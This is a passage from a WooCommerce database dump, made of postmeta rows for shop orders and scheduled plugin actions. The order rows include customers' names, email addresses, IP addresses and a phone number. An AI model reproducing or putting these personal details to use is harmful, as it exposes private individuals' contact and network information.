Safari/537.36'),(18772,32274,'_created_via','checkout'),(18773,32274,'_cart_hash','d021ae684735360d2f78f9766d28cf96'),(18774,32274,'_billing_first_name','Nazeer'),(18775,32274,'_billing_last_name','Abrahams'),(18776,32274,'_billing_email','nazeer@digitalstrategies.co.za'),(18777,32274,'_order_currency','ZAR'),(18778,32274,'_cart_discount','551'),(18779,32274,'_cart_discount_tax','0'),(18780,32274,'_order_shipping','0.00'),(18781,32274,'_order_shipping_tax','0'),(18782,32274,'_order_tax','0'),(18783,32274,'_order_total','274.00'),(18784,32274,'_order_version','3.6.5'),(18785,32274,'_prices_include_tax','no'),(18786,32274,'_billing_address_index','Nazeer Abrahams        nazeer@digitalstrategies.co.za '),(18787,32274,'_shipping_address_index','        '),(18788,32274,'is_vat_exempt','no'),(18789,32276,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1564999098;}'),(18790,32274,'_wcf_checkout_id','31362'),(18791,32274,'_wcf_flow_id','31300'),(18792,32274,'_wcf_bump_product','31327'),(18793,32274,'es_wc_activecampaign_opt_in','no'),(18794,32277,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565004215;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18795,32278,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565004215;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18796,32279,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565007849;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18797,32280,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565007849;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18798,32281,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565013157;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18799,32282,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565013157;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18800,32283,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565019272;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18801,32284,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565019272;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18802,32286,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565025301;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18803,32287,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565025301;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18804,32288,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565028923;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18805,32289,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565028923;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18806,32290,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565033148;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18807,32291,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565033148;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18808,32292,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565038569;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18809,32293,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565038569;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18810,32294,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565045473;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18811,32295,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565045473;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18812,32296,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565049962;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18813,32297,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565049962;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18814,32298,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565054174;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18815,32299,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565054174;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18816,32300,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565060946;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18817,32301,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565060946;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18818,32302,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565068593;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18819,32303,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565068594;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18820,32304,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565074245;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18821,32305,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565074245;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18822,32306,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565078777;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18823,32307,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565078777;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18824,32308,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565082392;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18825,32309,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565082393;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18826,32310,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1565078890;}'),(18827,32311,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1565079174;}'),(18828,32312,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565087637;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18829,32313,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565087637;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18830,32314,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565091347;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18831,32315,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565091347;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18832,32316,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565098317;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18833,32317,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565098317;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18834,32318,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565105239;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18835,32319,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565105239;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18836,32320,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565109103;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18837,32321,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565109103;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18838,32322,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565115665;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18839,32323,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565115665;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18840,32324,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565119722;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18841,32325,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565119722;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18842,32326,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565123739;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18843,32327,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565123739;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18844,32328,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565128123;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18845,32329,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565128123;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18846,32330,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565132912;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18847,32331,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565132912;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18848,32332,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565136542;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18849,32333,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565136543;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18850,32334,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565141947;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18851,32335,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565141947;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18852,32336,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565147334;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18853,32337,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565147334;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18854,32338,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565157420;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18855,32339,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565157420;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18856,32340,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565163092;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18857,32341,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565163092;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18858,32342,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565166791;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18859,32343,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565166791;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18860,32344,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565170414;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18861,32345,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565170414;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18862,32347,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1565169524;}'),(18863,32349,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1565169529;}'),(18864,32348,'_order_key','wc_order_5rC2SMr5dbq3L'),(18865,32348,'_customer_user','0'),(18866,32348,'_payment_method','payfast'),(18867,32348,'_payment_method_title','PayFast'),(18868,32348,'_customer_ip_address','197.159.37.186'),(18869,32348,'_customer_user_agent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'),(18870,32348,'_created_via','checkout'),(18871,32348,'_cart_hash','d199f32e8cddad257ae1b1febdf65d6f'),(18872,32348,'_billing_first_name','gghh'),(18873,32348,'_billing_last_name','hgg'),(18874,32348,'_billing_address_1','192.168.3.60'),(18875,32348,'_billing_city','Cape town'),(18876,32348,'_billing_state','WC'),(18877,32348,'_billing_postcode','4525'),(18878,32348,'_billing_country','ZA'),(18879,32348,'_billing_email','nsy@gmail.com'),(18880,32348,'_billing_phone','623465225'),(18881,32348,'_order_currency','ZAR'),(18882,32348,'_cart_discount','0'),(18883,32348,'_cart_discount_tax','0'),(18884,32348,'_order_shipping','0.00'),(18885,32348,'_order_shipping_tax','0'),(18886,32348,'_order_tax','0'),(18887,32348,'_order_total','2250.00'),(18888,32348,'_order_version','3.6.5'),(18889,32348,'_prices_include_tax','no'),(18890,32348,'_billing_address_index','gghh hgg  192.168.3.60  Cape town WC 4525 ZA nsy@gmail.com 623465225'),(18891,32348,'_shipping_address_index','        '),(18892,32348,'is_vat_exempt','no'),(18893,32350,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1565169524;}'),(18894,32348,'es_wc_activecampaign_opt_in','no'),(18895,32351,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1565169564;}'),(18896,32348,'is_vat_exempt','no'),(18897,32352,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1565169564;}'),(18898,32353,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565174100;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18899,32354,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565174100;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18900,32355,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565177749;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18901,32356,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565177749;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18902,32357,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565181490;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18903,32358,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565181490;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18904,32359,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565187344;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18905,32360,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565187344;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18906,32361,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565191022;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18907,32362,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565191022;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18908,32363,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565200827;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18909,32364,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565200828;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18910,32365,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565207854;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18911,32366,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565207854;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18912,32367,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565215851;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18913,32368,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565215852;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18914,32369,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565219918;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18915,32370,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565219918;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18916,32371,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565224229;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18917,32372,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565224229;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18918,32373,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565228518;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18919,32374,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565228519;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18920,32375,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565239802;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18921,32376,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565239802;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18922,32377,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565245457;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18923,32378,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565245458;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18924,32379,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565249476;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18925,32380,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565249476;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18926,32381,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565253142;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18927,32382,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565253142;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18928,31938,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:3:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:4:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:4;s:10:\"devanagari\";}}'),(18929,32384,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565256760;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(18930,32385,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1565256760;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:36